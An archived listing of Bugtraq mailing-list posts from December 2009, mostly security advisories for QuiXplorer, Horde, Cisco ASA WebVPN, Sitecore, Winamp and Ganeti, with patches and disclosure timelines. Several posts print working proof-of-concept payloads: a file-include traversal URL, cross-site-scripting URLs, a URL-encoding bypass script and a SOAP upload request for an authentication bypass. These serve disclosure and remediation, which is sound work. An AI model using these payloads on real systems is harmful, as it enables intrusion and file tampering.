Nabble - Bugtraq

[ MDVSA-2009:335 ] ffmpeg

2009-12-17T11:06:01Z

[ISecAuditors Security Advisories] QuiXplorer <=2.4.1beta Remote Code Execution vulnerability

2009-12-17T08:34:05Z

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-003
- Original release date: March 2nd, 2009
- Last revised: December 17th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 9/10 (CVSS scored)
=============================================

I. VULNERABILITY
-------------------------
QuiXplorer <= 2.4.1beta standalone and as a Mambo/Joomla component
'lang' parameter Remote Code Execution Vulnerability.

II. BACKGROUND
-------------------------
QuiXplorer is a multi-user, web-based file-manager. It allows you to
manage and/or share files over the Internet, or an Intranet.
It's currently available in many languages and with GPL and MPL
licenses and referred in other open source projects.

III. DESCRIPTION
-------------------------
QuiXplorer is prone to a local file include and directory traversal
vulnerability because the application fails to sufficiently sanitize
user-supplied input. The parameter 'lang' is not properly sanitized.
Since the application allows to upload files to the server could be
combined with previous vulnerabilities to allow an attacker to execute
arbitrary code remotely in the context of the webserver. This may aid
in launching further attacks.

In order to perform the attack, an attacker could upload a PHP
malicious code (upload action is allowed by the application), then
exploit a bug to know the full path to the local file recently
uploaded (if 'display_errors' directive is set to On) and then include
it exploiting the local file include and directory traversal flaw
(using ../../path/to/file) to finally execute the PHP code.
Successfully exploitation of this flaw may aid in the compromise of
the server in the context of the webserver.

IV. PROOF OF CONCEPT
-------------------------
Here is the affected code:

80 // Get Language
81
if(isset($GLOBALS['__GET']["lang"]))$GLOBALS["lang"]=$GLOBALS['__GET']["lang"];
82
elseif(isset($GLOBALS['__POST']["lang"]))$GLOBALS["lang"]=$GLOBALS['__POST']["lang"];
83
//------------------------------------------------------------------------------
84 // Necessary files
85 ob_start(); // prevent unwanted output
86 require "./.config/conf.php";
87 if(isset($GLOBALS["lang"])) $GLOBALS["language"]=$GLOBALS["lang"];
88 require "./_lang/".$GLOBALS["language"].".php"; <----- HERE
89 require "./_lang/".$GLOBALS["language"]."_mimes.php"; <----- HERE

Here is a poc:
PoC: http://site/path/?lang=../path/to/malicious_uploaded_code

Exploiting this bug is possible to include PHP files, allowing to
execute any arbitrary code code he want.
Also is possible to hide the crafted parameters data including it
through POST method, making detection more difficult to site
administrator.

About the full path disclosure, if the webserver has the show_errors
directive set to 'On', try:

http://site/path/?lang=no_exists

And the application return:

Warning: require(./_lang/no_exists.php) [function.require]: failed to
open stream: No such file or directory in
/var/www/quix/.include/init.php on line 88
Fatal error: require() [function.require]: Failed opening required
'./_lang/no_exists.php'
(include_path='.:/usr/share/php:/usr/share/pear') in
/var/www/quix/.include/init.php on line 88

Revealing the path to the home directory of the filemanager

V. BUSINESS IMPACT
-------------------------
An attacker could view any file or execute arbitrary code remotely
into the context of the webserver.

VI. SYSTEMS AFFECTED
-------------------------
All version of QuiXplorer are affected.
At the moment <= 2.4.1beta.

VII. SOLUTION
-------------------------
As developers give no response we add the mitigation for its solution.
To patch only change this lines...

From:
81 if(isset($GLOBALS['__GET']["lang"]))
$GLOBALS["lang"]=$GLOBALS['__GET']["lang"];
82 elseif(isset($GLOBALS['__POST']["lang"]))
$GLOBALS["lang"]=$GLOBALS['__POST']["lang"];

To:
81 if(isset($GLOBALS['__GET']["lang"]))
$GLOBALS["lang"]=basename($GLOBALS['__GET']["lang"]);
82 elseif(isset($GLOBALS['__POST']["lang"]))
$GLOBALS["lang"]=basename($GLOBALS['__POST']["lang"]);

Parsing the parameters with basename() function the flaw its fixed.

And to prevent the full path disclosure...

From:
88 require "./_lang/".$GLOBALS["language"].".php";
89 require "./_lang/".$GLOBALS["language"]."_mimes.php";

To:
88 if(file_exists("./_lang/".$GLOBALS["language"].".php")) require
"./_lang/".$GLOBALS["language"].".php";
89 else require "./_lang/en.php";
90 if(file_exists("./_lang/".$GLOBALS["language"]."_mimes.php"))
require "./_lang/".$GLOBALS["language"]."_mimes.php";
91 else require "./_lang/en_mimes.php";

VIII. REFERENCES
-------------------------
http://sourceforge.net/projects/quixplorer/
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 17, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: QuiXplorer contacted. No answer.
December 13, 2009: QuiXplorer contacted again. No answer.
December 17, 2009: Sent to lists with remediation proposal.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

[Suspected Spam][oCERT-2009-019] Ganeti path sanitization errors

2009-12-17T08:26:31Z

#2009-019 Ganeti path sanitization errors

Description:

Ganeti, an open source virtualisation manager, suffers from an input
validation bug that poses a security risk.

The vulnerability applies to the commands submitted, either locally via
gnt-* commands or remotely via the HTTP API, to the machine acting as a
cluster master. Validation for a file path argument is missing resulting
in arbitrary code execution, local exploitation applies to any user with
rights to execute ganeti commands while remote exploitation applies to
configured users authenticated over the ganeti RAPI.

While the local exploitation is a non-issue for the root user, which can
execute arbitrary commands in any case, it affects local non-root users
which are allowed to execute gnt-* commands via sudo or other suid
wrappers.

Affected version:

Ganeti >= 1.2.4 (local), >= 2.0.0 (remote)

Fixed version:

Ganeti >= 1.2.9, >= 2.0.5, >= 2.1.0~rc2

Credit: vulnerability report, PoC and patches received from Ganeti authors
Iustin Pop and Michael Hanselmann, Google Inc.

CVE: CVE-2009-4261

CVE: N/A

Timeline:

2009-12-07: vulnerability report received
2009-12-08: contacted affected vendors
2009-12-17: ganeti 1.2.9, 2.0.5, 2.1.0~rc2 released
2009-12-17: advisory published

References:
http://groups.google.com/group/ganeti/browse_thread/thread/cbce23d89103a8d2

Permalink:
http://www.ocert.org/advisories/ocert-2009-019.html

--
Andrea Barisani | Founder & Project Coordinator
oCERT | Open Source Computer Emergency Response Team

<lcars@...> http://www.ocert.org
0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
"Pluralitas non est ponenda sine necessitate"

VUPEN Security Research - Winamp PNG and JPEG Data Integer Overflow Vulnerabilities

2009-12-17T07:53:44Z

VUPEN Security Research - Winamp PNG and JPEG Data Integer Overflow
Vulnerabilities

http://www.vupen.com/english/research.php

I. BACKGROUND
---------------------

Winamp is a proprietary media player written by Nullsoft,
now a subsidiary of AOL. It is skinnable, multi-format
freeware/shareware (from Wikipedia).

Winamp is a one of the world's most popular media players
with over 73 million users globally (comScore Media Metrix,
January 2009).

II. DESCRIPTION
---------------------

VUPEN Vulnerability Research Team discovered critical
vulnerabilities affecting Winamp.

These vulnerabilities are caused due to integer overflow errors within
the "jpeg.w5s" and "png.w5s" filters when processing malformed
JPEG or PNG data in a media (e.g. MP3) file, which could allow
attackers to execute arbitrary code by tricking a user into opening
a specially crafted MP3.

III. AFFECTED PRODUCTS
--------------------------------

Winamp version 5.56 and prior

IV. Exploits - PoCs & Binary Analysis
----------------------------------------

In-depth binary analysis of the vulnerabilities and proof-of-concept
codes have been released by VUPEN Security through the
VUPEN Exploits & PoCs Service :

http://www.vupen.com/exploits

V. SOLUTION
----------------

Upgrade to Winamp version 5.57 :
http://www.winamp.com/media-player

VI. CREDIT
--------------
The vulnerabilities were discovered by Nicolas JOLY of VUPEN Security

VII. REFERENCES
----------------------

http://www.vupen.com/english/advisories/2009/3576
http://forums.winamp.com/showthread.php?threadid=315355

VIII. DISCLOSURE TIMELINE
-----------------------------------

2009-11-25 - Vendor notified
2009-11-25 - Vendor response
2009-12-02 - Status update received
2009-12-17 - Coordinated public Disclosure

[ISecAuditors Security Advisories] Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability

2009-12-17T07:39:01Z

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-012
- Original release date: October 13th, 2009
- Last revised: December 16th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3701
- Severity: 6.3/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability

II. BACKGROUND
-------------------------
The Horde Application Framework is a modular, general-purpose web
application framework written in PHP. It provides an extensive array
of classes that are targeted at the common problems and tasks involved
in developing modern web applications.

III. DESCRIPTION
-------------------------
Input passed to 'PHP_SELF' variable is not properly filtered before
being returned to the user. This can be explotied to inject arbitrary
HTML or to execute arbitrary script code in a user's browser session
in context of an affected site. In order to successfully exploit this
vulnerability the targeted user has to be logged as an administrator.

horde-3.3.5/admin/cmdshell.php:46:<form action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="post">
horde-3.3.5/admin/sqlshell.php:29:<form name="sqlshell" action="<?php
echo $_SERVER['PHP_SELF'] ?>" method="post">
horde-3.3.5/admin/phpshell.php:42:<form action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="post">

In order to filter the "PHP_SELF" variable, the htmlspecialchars
function has to be used, like in
'horde-3.3.5/templates/shares/edit.inc' file:

horde-3.3.5/templates/shares/edit.inc:1:<form name="edit"
method="post" action="<?php echo
htmlspecialchars($_SERVER['PHP_SELF']) ?>">

IV. PROOF OF CONCEPT
-------------------------
This PoC will show an alert with the text "xss"

http://site/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
http://site/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
http://site/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>

V. BUSINESS IMPACT
-------------------------
Is possible to execute arbitrary HTML or script code in a targeted
user's browser. Only works with administration sessions.

VI. SYSTEMS AFFECTED
-------------------------
Horde 3.3.5 is vulnerable, others may be affected.

VII. SOLUTION
-------------------------
Upgrade to version 3.3.6

VIII. REFERENCES
-------------------------
http://www.horde.org
http://lists.horde.org/archives/announce/2009/000529.html
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
October 13, 2009: Initial release
October 19, 2009: Added CVE id.
December 13, 2009: Revision.
December 16, 2009: Las revision.

XI. DISCLOSURE TIMELINE
-------------------------
October 13, 2009: Vulnerability discovered by
Internet Security Auditors.
October 13, 2009: Sent to developers.
The issue is considered hard to exploit and
solution is delayed.
December 13, 2009: Second contact for correction plan.
December 15, 2009: New release published.
December 16, 2009: Sent to public lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

[ISecAuditors Security Advisories] Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

2009-12-17T04:48:41Z

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013
- Original release date: December 7th, 2009
- Last revised: December 16th, 2009
- Discovered by: David Eduardo Acosta Rodriguez
- Severity: 4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND
-------------------------
Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
Services Routers to extend network resources to virtually any remote
user with access to the Internet and a web browser.

III. DESCRIPTION
-------------------------
Cisco VPN SSL Clientless lets administrators define rules to specific
targets within the private network that WebVPN users will be able to
access. This specific targets are published using links in VPN SSL
home page. These links (URL) are protected (obfuscated) using a ROT13
substitution[2] and converting ASCII characters to hexadecimal. An
user with a valid account and without "URL entry" can access any
internal/external resource simply taken an URL, encrypt with ROT 13,
convert ASCII characters to hexadecimal and appending this string to
Cisco VPN SSL URL.

IV. PROOF OF CONCEPT
-------------------------
Using URL http://intranet published on internal server (not accessible
from home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
echo "";

V. BUSINESS IMPACT
-------------------------
Users with valid account can surf to internal/external resources,
bypassing controls in home page.

VI. SYSTEMS AFFECTED
-------------------------
Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION
-------------------------
Always set "webtype" ACL and "filter" to block access in Web VPN SSL
(not activated by default). Included in Cisco site now.
Follow recommendations from "Cisco Understanding Features Not
Supported in Clientless SSL VPN" [3].

VIII. REFERENCES
-------------------------
[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/
guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com))
for additional research.

X. REVISION HISTORY
-------------------------
December 7, 2009: Initial release.
December 16, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
December 9, 2009: Vendor contacted
December 9, 2009: Vendor response, they include our mitigation
proposal in their website and start the analysis
of correction required.
December 16, 2009: Vendor confirms remediation and public statement.
December 17, 2009: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

SEC Consult SA-20091217-0 :: Authentication bypass and file manipulation in Sitecore Staging Module

2009-12-17T04:17:56Z

SEC Consult Security Advisory < 20091217-0 >
==========================================================================
title: Authentication bypass and file manipulation in
Sitecore Staging Module
products: Sitecore Staging Module
vulnerable version: Sitecore Staging Module <= 5.4.0 rev.080625
fixed version: Staging 5.4.0 rev.091111
impact: critical
homepage:
http://www.sitecore.net/en/Products/Sitecore-CMS.aspx
found: 2009-09-07
by: L. Weichselbaum / SEC Consult / www.sec-consult.com
==========================================================================

Vendor description:
-------------------
Sitecore CMS makes it effortless to create content and experience rich
websites that help you achieve your business goals such as increasing
sales and search engine visibility, while being straight-forward to
integrate and administer. Sitecore lets you deliver sites that are
highly scalable, robust and secure. Whether you're focused on
marketing, development and design, or providing site content, Sitecore
delivers for you.

The main purpose of the Sitecore Staging module is to update two or
more Sitecore installations across a firewall.

source: http://www.sitecore.net/en/Products.aspx
http://sdn.sitecore.net/upload/sdn5/sitecore6modules/staging/
staging-module-installation-and-configuration-guide.pdf

Vulnerability overview/description:
-----------------------------------
The Staging Webservice (normally found in "/sitecore modules/staging/
service/api.asmx") used for transmitting files between the Sitecore
Master and Slave Server is vulnerable to authentication bypass and
therefore
* files can be uploaded in arbitrary directories on the server
* files can be downloaded from arbitrary directories on the server
* directory listings of the whole server can be received
* the webserver cache can be deleted

An attacker is able to upload a shell, modify or delete sensitive data
or gain the whole source code of the application. Furthermore it is
possible to retrieve directory listings of directories of the whole
server and the webroot. All these actions are performed with the rights
of the webserver user. One tested server allowed us to compromise the
whole server by uploading a shell into the webroot.

Proof of concept:
-----------------
Authentication bypass and file manipulation
===========================================
To exploit this vulnerability, the example of "api.asmx?op=Upload" can
be used in a slightly modified form. The parameters "Username" and
"Password" can be set at random, but they must not be empty. The
parameter "File" contains the base64 encoded content of the file which
should be uploaded. For the parameters "append" and "isEncrypted" the
value "false" is most suitable. In "Destination" the location of the
file on the remote system can be specified. The following POST-request
creates a file named test.txt in C:\temp. It would also be possible to
upload a shell into the Webroot.

POST /sitecore%20modules/staging/service/api.asmx HTTP/1.1
Host: hostToExploit
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 599

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<Upload xmlns="http://Sitecore/modules/Staging/API/">
[Soap-Stuff]
</Upload>
</soap12:Body>
</soap12:Envelope>

The same applies to the webservice operations "Download", "List" and
"Clear Cache".

Vulnerable versions:
--------------------
Sitecore Staging Module
* <= v5.4.0 rev.080625

Vendor contact timeline:
------------------------
2009-10-09: Contacting Sitecore.
2009-10-12: Reply from Sitecore.
2009-10-12: Preliminary advisory with full vulnerability details was
sent to Sitecore.
2009-12-02: Requested status of the planned security fixes.
2009-12-03: Reply from Sitecore, fixes are now in second iteration in
their QA department and they expect to release this before Christmas.
2009-12-03: Reply from Sitecore, vulnerabilities have been fixed and
new version has been released.
2009-12-16: Final version of the advisory sent to Sitecore and release
date was scheduled.
2009-12-16: Reply from Sitecore.
2009-12-17: Release of the advisory.

Solution:
---------
Update to Sitecore Staging Module v5.4.0 rev.091111

Workaround:
-----------
Delete the Staging Webservice (normally found in "/sitecore modules/
staging/service/api.asmx") to prevent arbitrary file manipulation.
The Sitecore Staging Module can thereby only use FTP for transmitting
files between the Sitecore Master and Slave with the Sitecore Staging
Module.

Advisory URL:
-------------
https://www.sec-consult.com/advisories_e.html#a63

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2009

Rumba XML XSS vulnerability

2009-12-17T04:02:16Z

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#

###########################################

PoC :

http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/index.php/>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>

Secunia Research: Winamp Impulse Tracker Instrument Parsing Buffer Overflows

2009-12-17T00:49:40Z

======================================================================

Secunia Research 17/12/2009

- Winamp Impulse Tracker Instrument Parsing Buffer Overflows -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Winamp 5.56 Media Player

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"It is more than just a player. It's your window to the multimedia
world. From MP3s to streaming video, Winamp is the one place you go to
feed your audio/video habit.".

Product Link:
http://www.winamp.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered three vulnerabilities in Winamp, which
can be exploited by malicious people to compromise a user's system.

The vulnerabilities are caused by boundary errors in the Module
Decoder Plug-in (IN_MOD.DLL) when parsing instrument definitions and
can be exploited to cause heap-based buffer overflows via a specially
crafted Impulse Tracker file.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 5.57.

======================================================================
6) Time Table

03/12/2009 - Vendor notified.
03/12/2009 - Vendor response.
17/12/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-3995 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-52/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

Secunia Research: Winamp Impulse Tracker Sample Parsing Buffer Overflow

2009-12-17T00:49:34Z

======================================================================

Secunia Research 17/12/2009

- Winamp Impulse Tracker Sample Parsing Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Winamp 5.56 Media Player

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"It is more than just a player. It's your window to the multimedia
world. From MP3s to streaming video, Winamp is the one place you go to
feed your audio/video habit.".

Product Link:
http://www.winamp.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Winamp, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused by a boundary error in the Module Decoder
Plug-in (IN_MOD.DLL) when parsing samples and can be exploited to
cause a heap-based buffer overflow via a specially crafted Impulse
Tracker file.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 5.57.

======================================================================
6) Time Table

03/12/2009 - Vendor notified.
03/12/2009 - Vendor response.
17/12/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-3995 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-53/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

Secunia Research: Winamp Ultratracker File Parsing Buffer Overflow

2009-12-17T00:49:27Z

======================================================================

Secunia Research 17/12/2009

- Winamp Ultratracker File Parsing Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Winamp 5.56 Media Player

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"It is more than just a player. It's your window to the multimedia
world. From MP3s to streaming video, Winamp is the one place you go to
feed your audio/video habit.".

Product Link:
http://www.winamp.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Winamp, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an error in the Module Decoder Plug-in
(IN_MOD.DLL) when parsing Ultratracker files and can be exploited to
cause a heap-based buffer overflow.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 5.57.

======================================================================
6) Time Table

07/12/2009 - Vendor notified.
07/12/2009 - Vendor response.
17/12/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-3996 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-56/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

Secunia Research: Winamp Oktalyzer Parsing Integer Overflow Vulnerability

2009-12-17T00:49:20Z

======================================================================

Secunia Research 17/12/2009

- Winamp Oktalyzer Parsing Integer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Winamp 5.56 Media Player

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"It is more than just a player. It's your window to the multimedia
world. From MP3s to streaming video, Winamp is the one place you go to
feed your audio/video habit.".

Product Link:
http://www.winamp.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Winamp, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an integer overflow error in the
Module Decoder Plug-in (IN_MOD.DLL) when parsing Oktalyzer files and
can be exploited to cause a heap-based buffer overflow.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Update to version 5.57.

======================================================================
6) Time Table

07/12/2009 - Vendor notified.
07/12/2009 - Vendor response.
17/12/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Dyon Balding, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-3997 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-57/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

[ MDVSA-2009:334 ] poppler

2009-12-16T16:51:01Z

Campus Party Eu 2010 Security Challenge - Call For Participants

2009-12-16T16:34:52Z

Greetings,

The Spanish Ministry for Science and Innovation presents in Madrid
from 14th – 18th April, and during the Spanish Presidency of the
European Union, Campus Party Europe
(http://www.campus-party.eu/home-en.html) : a special edition of what
is considered the biggest event for technology, creativity and digital
culture online in the world.

For four days, 800 young people from each of the 27 member states of
the EU will participate in activities such as conferences, workshops
and challenges centred around three knowledge areas: Science, Digital
Creativity and Innovation.

We, SecurityByDefault.com crew, are going to coordinate the Network
Security Area, which you can find more information on this link :
http://www.campus-party.eu/NetworkSecurity.html

Therefore, and as part of the agenda, we are organizing a hacking
challenge that calls for anyone born in any of the member countries of
the European Union, which is interested in participating in a
challenge as ambitious as this.

We offer:

*) Travel and accommodation fully in charge of the organization (Flight + Hotel)

*) Possibility to interact with other experts of many nationalities

*) Attendance at lectures given by renowned speakers

*) Cash prizes for winners (up to 2,000 € for the winner)

*) The chance to enjoy such an interesting city like Madrid

-- What we are looking for:

The maximum is two people for each member country of the European
Union : http://en.wikipedia.org/wiki/European_Union

-- Selection:

To participate, send us a summary (about 30 lines) of the participant
information (birthplace, biography, contests in which you have
previously participated, released papers/tools, etc) written in
english to the following e-mail address:
campuseu_AT_securitybydefault.com

Selection will be made based on purely technical skills, so the better
curriculum, more likely to be chosen.

-- Deadline:

The deadline is 31 January 2010.

-- Contact:

If you have any questions, don't hesitate to contact us :
contacto_AT_securitybydefault.com

[security bulletin] HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution

2009-12-16T16:23:02Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

